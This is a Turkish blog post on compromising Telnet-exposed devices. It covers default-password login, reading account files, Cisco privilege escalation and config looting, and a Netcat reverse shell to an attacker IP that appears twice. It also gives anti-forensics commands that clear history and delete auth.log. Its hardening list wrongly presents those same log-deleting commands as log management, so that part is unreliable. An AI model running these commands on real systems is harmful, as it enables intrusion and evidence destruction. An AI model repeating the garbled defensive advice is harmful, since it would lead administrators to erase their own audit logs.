CyberFlow Logo CyberFlow BLOG
Telnet Pentest

Cihaz Ele Geçirme Senaryoları: Siber Güvenlikte Ustalaşmanın Yolları

✍️ Ahmet BİRKAN 📂 Telnet Pentest

Cihaz ele geçirme senaryoları hakkında bilinmesi gereken tüm detaylarla dolu bu yazıda, sızma testleri ile siber güvenlik bilginizi artırın.

Cihaz Ele Geçirme Senaryoları: Siber Güvenlikte Ustalaşmanın Yolları

Siber güvenlik dünyasında cihaz ele geçirme senaryoları hayati bir öneme sahiptir. Bu yazıda, kritik aşamaları ve teknikleri derinlemesine inceleyeceksiniz. Cihazları etkili bir şekilde ele geçirmek için gereken bilgi ve stratejiler burada.

Giriş ve Konumlandırma

Cihaz ele geçirme senaryoları, siber güvenlik alanında kritik bir tema olup, birçok güvenlik uzmanı ve penetration tester (pentester) için önemli bir çalışma alanıdır. Bu senaryolar, bir cihazın veya sistemin istenmeyen bir şekilde ele geçirilmesi ve bu noktada gerçekleştirilen eylemlerin detaylarını içerir. Siber saldırıların giderek artan tehlikesi ve karmaşıklığı, bu tür senaryoları anlamayı ve savunma stratejilerini geliştirmeyi zorunlu kılmaktadır.

Siber güvenlik dünyasında, cihaz ele geçirme genellikle varsayılan kimlik bilgileri üzerinden başlar. Yapılan araştırmalar, saldırganların hedef cihazlara sızmak için çoğu zaman standart kullanıcı adı ve şifre kombinasyonlarını kullandıklarını göstermektedir. Örneğin, Nmap gibi araçların yardımıyla bir cihazın markası ve işletim sistemi belirlendikten sonra, bilinen en yaygın kimlik bilgileri kullanılarak sızılabilecek kapılar açılabilmektedir. Bu durum, sistemlerin ne kadar savunmasız olabileceğini gözler önüne serer.

nmap -sV 192.168.1.1

Yukarıdaki komutla, hedef cihazın geliştirilmiş bağlantı bilgisini edinebiliriz. Başarılı bir sızma gerçekleştirilmesi durumunda, ele geçirilen sistem üzerinde gerçekleştirilmesi gereken ilk test, sistemin "röntgeninin çekilmesi" yani var olan dosya sisteminin ve kullanıcı hesaplarının analizidir. Bu aşama, sızma sonrası elde edilen bilgilerin derlenmesi açısından oldukça önemlidir.

Ele geçirilen bir sistemde, kullanıcı şifrelerinin hash'lenmiş halleri, kritik bir bilginin kaynağını temsil eder. Özellikle Linux tabanlı sistemlerde, bu veriler yalnızca yetkili kullanıcılar tarafından erişilebilir şekilde saklanmaktadır. Bu durum, saldırganların etki alanlarını genişletmelerini önleyen bir güvenlik katmanıdır. Ancak, doğru araçlar ve bilgiyle bu şifrelerin ele geçirilmesi ya da geri dönüşüm yöntemleriyle kırılması mümkündür.

Cihaz ele geçirilme sürecinde önemli bir kavram da, "arka kapı" (backdoor) teknikleridir. Saldırgan, erişim sağladıktan sonra sistemde kalıcılığını sağlamak için belirli bağlantılar kurarak, gelecekte yeniden erişim imkanı elde etmeyi hedefler. Bu tür işlevler, bir cihazın arka kapıdan saldırganın kontrolüne geçmesini beraberinde getirir ve güvenlik duvarlarının aşılmasında kritik bir rol oynar.

Cihaz Yönetimi ve Güvenliği

Güvenlik önlemlerini artırmak amacıyla, Cisco gibi ağ cihazları üzerinden geçirilmiş bir oturumda, Privileged EXEC moduna geçerek daha derin yapılandırma değişiklikleri mümkün hale gelir. Bu modda, sistemin tüm konfigürasyonu üzerinde tam yetki sahibi olursunuz. Ancak, bu yetkiyi elde etmek de basit bir iş değildir ve uygun metodlarla gerçekleştirilmesi gerekmektedir.

enable

Bu komut, özel yetkilere sahip olmanıza olanak tanır. Ele geçirilen cihazın tüm yapılandırmalarına ve kritik verilere ulaşmak için yöneticilik yetkilerini ele almak, potansiyel bir saldırının ana temayı oluşturur. Bu noktada, saldırganlar genellikle ele geçirilen cihazın iç yapısını inceleyerek, veritabanları ve sistem konfigürasyonları üzerinden ilerleyebilir.

Sızma sonrası veri toplama (looting) aşaması, ağdaki güvenlik açıklarındaki en büyük kazançtır. Saldırganlar, ele geçirilen cihazın yapılandırma dosyalarını ve diğer kritik bilgileri çarparak, bir sonraki aşamaya geçiş yapabilirler. Mevcut yapılandırmaların bozulmadan korunması veya gizli bilgilerin sistemden silinmesi için belirli teknikler uygulanmalıdır.

Sonuç olarak, cihaz ele geçirme senaryoları, siber güvenlikte sürekli gelişen bir mücadele alanıdır. Hem saldırganlar hem de güvenlik uzmanları için, bu senaryoların uzmanlıkla ele alınması, savunma stratejilerinin ve önleyici tedbirlerin etkinliğini artırma bağlamında hayati öneme sahiptir. Hem saldırı tekniklerini hem de korunma yöntemlerini anlayarak, siber güvenlik profesyonelleri sürekli olarak bu savaşın içinde yer almalı ve bilgi birikimlerini güncel tutmalıdır.

Teknik Analiz ve Uygulama

Varsayılan Şifre ile Sızma

Cihaz ele geçirme senaryolarının büyük bir kısmı, varsayılan kimlik bilgileriyle başlatılır. Bu tür girişimlerde öncelikle Nmap gibi bir araç kullanarak hedef cihazın marka ve modelini tespit etmek önemlidir. Örneğin, Cisco marka bir cihazın taranması şu şekilde yapılabilir:

nmap -p 23 10.0.0.1

Bu komut, belirtilen IP adresindeki Telnet portunu tarar. Başarılı bir bağlantıdan sonra, sıklıkla kullanılan şifre kombinasyonları ile oturum açmayı deneyebiliriz:

telnet -l admin 10.0.0.1

Eğer cihaz varsayılan bir şifre kullanıyorsa, bu yöntemle giriş yapabiliriz.

Post-Exploitation: İlk Ganimetler

Cihaza giriş yaptıktan sonra, saldırganın ilk yapması gereken işlem sistemin genel bir analizini gerçekleştirmektir. Bu, dosya sistemi ve kullanıcı listesi gibi kritik verilere erişim sağlamak için yapılır. Linux tabanlı sistemlerde kullanıcı bilgileri genellikle /etc/passwd dosyasında bulunur. Kullanıcı listesini incelemek için aşağıdaki komutu kullanabiliriz:

cat /etc/passwd

Bu komut, sistemdeki tüm kullanıcı bilgilerini ve ana dizinlerini dökerek potansiyel hedef hesapları belirlemeye yardımcı olur.

Kritik Şifre Dosyası

Bir siber saldırgan için en değerli dosyalardan biri, şifrelerin hash'lenmiş hallerinin saklandığı dosyadır. Çoğu Linux tabanlı sistemde bu tür bilgiler genellikle shadow dosyasında bulunur. Bu dosyayı görüntülemek, saldırganın şifre kırma işlemlerine zemin hazırlar.

En Üst Yetkiye Sıçrama (Enable)

Ağ cihazlarına giriş yaptığınızda genellikle sınırlı bir modda başlarsınız. Yapılandırmayı değiştirmek için 'Privileged EXEC' moduna geçmek gereklidir. Bu işlem için aşağıdaki komut kullanılabilir:

enable

Bu komut, yöneticinin daha fazla yetki kazandığı bir moda geçiş yapmasını sağlar.

Kalıcılık (Persistence) Teknikleri

Saldırganın girişi kapattıktan sonra bile tekrar sistemde kalabilmesi için arka kapılar (backdoor) bırakması önemlidir. Bu, sistem yöneticisinin saldırıyı fark etmeden geri gelebilmek adına etkili bir yöntemdir.

Tersine Bağlantı (Reverse Shell)

Tersine bağlantı, hedef cihazın saldırganın makinesine bağlanmasını ve komut satırı yetkisini devretmesini sağlayan bir tekniktir. Bu yöntem, güvenlik duvarlarını aşmak için oldukça etkilidir. Örneğin, Netcat yüklü bir hedef cihazda, şu komutla tersine bağlantı sağlanabilir:

nc 10.10.10.5 4444 -e /bin/sh

Burada 10.10.10.5 saldırganın IP adresidir ve 4444 portu bağlantının dinleneceği porttur.

Ağda Yayılma (Lateral Movement)

Telnet cihazında elde edilen erişim, saldırgana iç ağda hareket etme yeteneği kazandırır. Bu aşamada, diğer sistemlere sızmak ve potansiyel hedefleri belirlemek için netstat komutu kullanılabilir:

netstat -antp

Bu komut, cihazın hangi sistemlerle iletişim kurduğunu gösterir ve saldırganın yeni hedefler belirlemesine yardımcı olur.

Ganimet Toplama (Looting)

Telnet cihazı ele geçirildiğinde en önemli görevlerden biri, yapılandırma dosyalarını, şifreleri ve gizli anahtarları çalmaktır. Cisco cihazlarında en değerli bilgiler running-config dosyasında bulunur. Bu dosyayı görüntülemek için şu komut kullanılabilir:

show running-config

Bu komut, ağ cihazının mevcut yapılandırmasını göstererek saldırgana çok değerli bilgiler sunar.

İzleri Silme (Anti-Forensics)

Bir siber saldırının ardından, yapılan işlemlerin izlerini silmek kritik bir adımdır. Bu aşamada çeşitli komutlar kullanılarak giriş ve yetkilendirme kayıtları temizlenebilir. Örneğin, mevcut oturumda yazılan komut geçmişini temizlemek için:

history -c

Kullanılabilir. Bunun yanı sıra, giriş kayıtlarını silmek için aşağıdaki komutlar da kullanılabilir:

rm /var/log/auth.log

Bu komutlar, sistem yöneticisinin saldırıyı fark etmesini zorlaştırır.

Nihai Güvenlik Adımı

Cihaz ele geçirilmiş bir durumdaysa, siber güvenlik uzmanlarının bu tür saldırıları önlemek için tavsiye ettiği en köklü çözümlerden biri, Telnet yerine SSH gibi daha güvenli bir protokol tercih etmektir. SSH, iletişimin şifrelenerek yapılmasını sağlar ve böylece birçok potansiyel zafiyeti kapatır. 

ssh [user]@[hostname]

Bu şekilde daha güncel ve güvenli bir bağlantı sağlanabilir. Bu tür tekniklerin uygulanması, bir güvenlik açığının minimize edilmesine yardımcı olur.

Risk, Yorumlama ve Savunma

Risk Değerlendirme ve Yorumlama

Siber güvenlikte risk değerlendirmesi, sistemin zayıflıklarını tespit etmek ve belirlenen zafiyetlerin potansiyel etkilerini analiz etmek açısından kritik bir unsurdur. Cihaz ele geçirme senaryolarında, değerlendirilen riskler genellikle cihazın yapılandırmasına bağlıdır. Elde edilen bulguların güvenlik anlamı, yanlış yapılandırma veya ciddi bir zafiyet tespit edildiğinde belirginleşir.

Varsayılan Şifre ile Sızma

Cihazlara yönelik yapılan sızma penetre testleri genellikle varsayılan kimlik bilgileri kullanılarak başlar. Örneğin, Cisco cihazlarına giriş yapmak için sıklıkla "admin" ve "admin" gibi standart kombinasyonlar kullanılır. Bu tür varsayılan şifreler, bir cihazın güvenliğini ciddi biçimde tehdit edebilir. Bir cihazın markasını belirlemek için Nmap kullanmak, rakiplerin hangi yollarla giriş yapabileceğini gözlemlemek açısından faydalıdır.

nmap -sV 10.0.0.1

Bu komut, hedef cihazın hangi servisleri sunduğunu ve bunların versiyonlarını tespit etmeye yarar. Varsayılan şifrelerin kullanılması, kötü niyetli kişilerin erişimini kolaylaştıracağından, sistem yöneticileri bu tür güvenlik açıklarının üzerine gidilmeli ve gerekli önlemler alınmalıdır.

Yanlış Yapılandırma ve Zafiyet Analizi

Yanlış yapılandırmalar, sistemin sızmaya karşı dirençsizlik göstermesine, dolayısıyla veri sızıntısına yol açabilir. Örneğin, bir ağ cihazındaki running-config dosyası, tüm ağ yapılandırmasının yanı sıra kritik şifreleri içermektedir. Ele geçirilen bu dosya, saldırganların tüm ağa derinlemesine sızmalarını sağlayabilir.

Cihaz ele geçirildiğinde ilk iş olarak dosya sistemi ve kullanıcılara odaklanmak gereklidir. Aşağıdaki komutlar, sistemdeki kullanıcıların listesi ve mevcut süreçler hakkında bilgi sahibi olunmasını sağlar:

cat /etc/passwd
ps aux

Bu bilgiler, saldırganın cihaz üzerindeki yetkisini artırmasına veya ağı daha fazla kontrol etmesine imkan tanır.

Tespit ve Servis Analizi

Saldırgan, hedef cihaz üzerinde gerçekleştirilen işlemlerde genellikle geri dönmeleri sağlamak amacıyla arka kapılar bırakabilir. Özellikle, Reverse Shell gibi yöntemlerle, ele geçirilen cihaz, saldırganın kontrolünde bir merdiven görevi görebilir.

nc -e /bin/sh 10.10.10.5 4444

Bu komut, hedef cihazın saldırganın makinesine doğru bir bağlantı başlatmasını sağlar. Hedef cihazda herhangi bir güvenlik duvarı varsa, bu yöntem onu göz ardı ederek iç ağlara erişim imkanı sunar.

Profesyonel Önlemler ve Hardening

Sistemlerin güvenliğinin artırılması için atılacak ilk adım, varsayılan şifrelerin değiştirilmesidir. Bunun yanı sıra, aşağıdaki hardening yöntemleri de uygulanmalıdır:

  1. SSH'nin Aktif Hale Getirilmesi: Telnet yerine, daha güvenli bir protokol olan SSH kullanılması önerilir. 

    sudo apt-get install openssh-server

  2. Güçlü Şifre Politikaları: Kullanıcılar için karmaşık ve uzun şifrelerin oluşturulması teşvik edilmelidir.

  3. Ağ İzleme: Tüm ağ trafiğinin izlenmesi, olası şüpheli aktivitelerin erken tespit edilmesini sağlar. Araçlar olarak Wireshark veya Snort kullanılabilir.

  4. Kullanıcı Yönetimi: Sisteme yeni kullanıcı eklemek ve bu kullanıcıların yetkilerini dikkatle belirlemek, kural ihlallerinin önüne geçebilir.

  5. Log Yönetimi: Log dosyalarının düzenli olarak incelenmesi, olası saldırıların tespit edilmesine yardımcı olur. Özellikle aşağıdaki komutlar, log kayıtlarının yönetimi için kullanılabilir:

rm /var/log/auth.log
history -c

Sonuç

Cihaz ele geçirme senaryolarında risk değerlendirme ve yorumlama süreci, siber güvenlik stratejisinin temel taşlarından biridir. Özellikle yanlış yapılandırmalar ve varsayılan şifreler, saldırganlar için büyük fırsatlar sunmaktadır. Sistem yöneticileri, bu tür durumların önüne geçmek amacıyla sürekli olarak güvenlik önlemlerini güncellemeli, sistemleri güçlendirerek potansiyel saldırılara karşı proaktif bir yaklaşım sergilemelidir. Bu sayede, hem mevcut zafiyetler ortadan kaldırılabilir hem de gelecekteki tehditler azaltılabilir.